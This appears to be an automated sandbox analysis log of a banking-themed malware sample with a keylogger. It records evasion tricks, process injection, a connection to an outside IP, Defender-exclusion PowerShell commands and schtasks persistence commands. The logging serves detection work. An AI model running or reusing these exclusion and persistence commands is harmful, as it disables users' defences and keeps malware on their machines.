                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7348Thread sleep time: -238593s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7348Thread sleep time: -238475s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7348Thread sleep time: -238359s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7348Thread sleep time: -238250s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7348Thread sleep time: -238110s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7348Thread sleep time: -237969s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7348Thread sleep time: -237532s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7348Thread sleep time: -236953s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7348Thread sleep time: -236672s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7348Thread sleep time: -236492s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7348Thread sleep time: -236367s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7348Thread sleep time: -236157s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7288Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7508Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7484Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 7968Thread sleep time: -14757395258967632s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 7968Thread sleep time: -240000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 7968Thread sleep time: -239578s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 7968Thread sleep time: -237203s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 7968Thread sleep time: -237093s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 7968Thread sleep time: -236984s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 7968Thread sleep time: -236874s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 7968Thread sleep time: -236765s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 7968Thread sleep time: -236656s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 7968Thread sleep time: -236546s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 7968Thread sleep time: -236433s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 7968Thread sleep time: -236313s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 7968Thread sleep time: -236187s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 7968Thread sleep time: -236077s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 7968Thread sleep time: -235968s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 7968Thread sleep time: -235857s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 7968Thread sleep time: -235743s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 7968Thread sleep time: -235639s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 7968Thread sleep time: -235514s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 7968Thread sleep time: -234291s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 7968Thread sleep time: -234021s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 7968Thread sleep time: -233723s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 7968Thread sleep time: -233482s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 7968Thread sleep time: -233374s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 7968Thread sleep time: -233166s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 7948Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7928Thread sleep time: -4611686018427385s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7896Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 3268Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 2060Thread sleep time: -10145709240540247s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 2260Thread sleep count: 8259 > 30
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 2260Thread sleep count: 1592 > 30
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 792Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe TID: 1732Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe TID: 1732Thread sleep time: -240000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe TID: 1732Thread sleep time: -239781s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\regasms.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
                  Source: C:\Users\user\AppData\Roaming\regasms.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Roaming\regasms.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\loaddll64.exe    Thread delayed: delay time: 120000
                  Source: rundll32.exe, 00000005.00000002.1365084163.0000022E7961A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1365084163.0000022E795B8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1392563958.0000025438D19000.00000004.00000020.00020000.00000000.sdmp, regasms.exe, 0000001B.00000002.3722145196.00000000012A6000.00000004.00000020.00020000.00000000.sdmp, regasms.exe, 0000001B.00000002.3723916494.0000000001354000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: regasms.exe, 0000001B.00000002.3722145196.00000000012A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
                  Source: rundll32.exe, 0000000B.00000002.1392563958.0000025438CB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0{
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Roaming\regasms.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\rundll32.exe :: Network Connect: 163.44.198.57 443
Source: 13.2.regasms.exe.28be350.0.raw.unpack, Keylogger.cs :: Reference to suspicious API methods: MapVirtualKey(vkCode, 0u)
Source: 13.2.regasms.exe.28be350.0.raw.unpack, DInvokeCore.cs :: Reference to suspicious API methods: DynamicAPIInvoke("ntdll.dll", "NtProtectVirtualMemory", typeof(Delegates.NtProtectVirtualMemory), ref Parameters)
Source: 13.2.regasms.exe.28be350.0.raw.unpack, AntiProcess.cs :: Reference to suspicious API methods: OpenProcess(1u, bInheritHandle: false, processId)
Source: C:\Users\user\AppData\Roaming\regasms.exe :: Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe"
Source: C:\Users\user\AppData\Roaming\regasms.exe :: Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe"
Source: C:\Users\user\AppData\Roaming\regasms.exe :: Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe"
Source: C:\Users\user\AppData\Roaming\regasms.exe :: Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe"
Source: C:\Users\user\AppData\Roaming\regasms.exe :: Memory written: C:\Users\user\AppData\Roaming\regasms.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\regasms.exe :: Memory written: C:\Users\user\AppData\Roaming\regasms.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe :: Memory written: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\cmd.exe :: Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.dqy.dll",#1
Source: C:\Users\user\AppData\Roaming\regasms.exe :: Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe"
Source: C:\Users\user\AppData\Roaming\regasms.exe :: Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AtkzppDHiyvcIR" /XML "C:\Users\user\AppData\Local\Temp\tmp18B1.tmp"
Source: C:\Users\user\AppData\Roaming\regasms.exe :: Process created: C:\Users\user\AppData\Roaming\regasms.exe "C:\Users\user\AppData\Roaming\regasms.exe"
Source: C:\Users\user\AppData\Roaming\regasms.exe :: Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe"
Source: C:\Users\user\AppData\Roaming\regasms.exe :: Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AtkzppDHiyvcIR" /XML "C:\Users\user\AppData\Local\Temp\tmp2042.tmp"
Source: C:\Users\user\AppData\Roaming\regasms.exe :: Process created: C:\Users\user\AppData\Roaming\regasms.exe "C:\Users\user\AppData\Roaming\regasms.exe"
Source: C:\Users\user\AppData\Roaming\regasms.exe :: Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "NotepadUpdate" /tr '"C:\Users\user\AppData\Roaming\NotepadUpdate.exe"' & exit
Source: C:\Users\user\AppData\Roaming\regasms.exe :: Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpD9E2.tmp.bat""
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe :: Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AtkzppDHiyvcIR" /XML "C:\Users\user\AppData\Local\Temp\tmp9EF.tmp"
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe :: Process created: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe"
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe :: Process created: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe"
Source: C:\Users\user\AppData\Roaming\regasms.exe :: Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "NotepadUpdate" /tr '"C:\Users\user\AppData\Roaming\NotepadUpdate.exe"' & exit
Source: C:\Windows\SysWOW64\cmd.exe :: Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "NotepadUpdate" /tr '"C:\Users\user\AppData\Roaming\NotepadUpdate.exe"'
Source: C:\Windows\SysWOW64\cmd.exe :: Process created: C:\Windows\SysWOW64\timeout.exe timeout 3
Source: C:\Windows\SysWOW64\cmd.exe :: Process created: C:\Users\user\AppData\Roaming\NotepadUpdate.exe "C:\Users\user\AppData\Roaming\NotepadUpdate.exe"
Source: C:\Windows\SysWOW64\cmd.exe :: Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "NotepadUpdate" /tr '"C:\Users\user\AppData\Roaming\NotepadUpdate.exe"'
Source: regasms.exe, 0000001B.00000002.3725431578.00000000033F5000.00000004.00000800.00020000.00000000.sdmp, regasms.exe, 0000001B.00000002.3725431578.000000000318B000.00000004.00000800.00020000.00000000.sdmp, regasms.exe, 0000001B.00000002.3725431578.00000000034CB000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: Program Manager
Source: regasms.exe, 0000001B.00000002.3725431578.00000000033F5000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: Program Manager`,
Source: regasms.exe, 0000001B.00000002.3725431578.000000000318B000.00000004.00000800.00020000.00000000.sdmp, regasms.exe, 0000001B.00000002.3725431578.0000000003196000.00000004.00000800.00020000.00000000.sdmp, regasms.exe, 0000001B.00000002.3725431578.00000000034E7000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: Program ManagerTe
Source: regasms.exe, 0000001B.00000002.3725431578.000000000318B000.00000004.00000800.00020000.00000000.sdmp, regasms.exe, 0000001B.00000002.3725431578.00000000034CB000.00000004.00000800.00020000.00000000.sdmp, regasms.exe, 0000001B.00000002.3725431578.0000000003196000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: Program Manager@\
Source: C:\Users\user\AppData\Roaming\regasms.exe :: Queries volume information: C:\Users\user\AppData\Roaming\regasms.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\regasms.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\regasms.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\regasms.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\regasms.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\regasms.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\regasms.exe :: Queries volume information: C:\Users\user\AppData\Roaming\regasms.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\regasms.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\regasms.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\regasms.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\regasms.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\regasms.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\regasms.exe :: Queries volume information: C:\Users\user\AppData\Roaming\regasms.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\regasms.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe :: Queries volume information: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
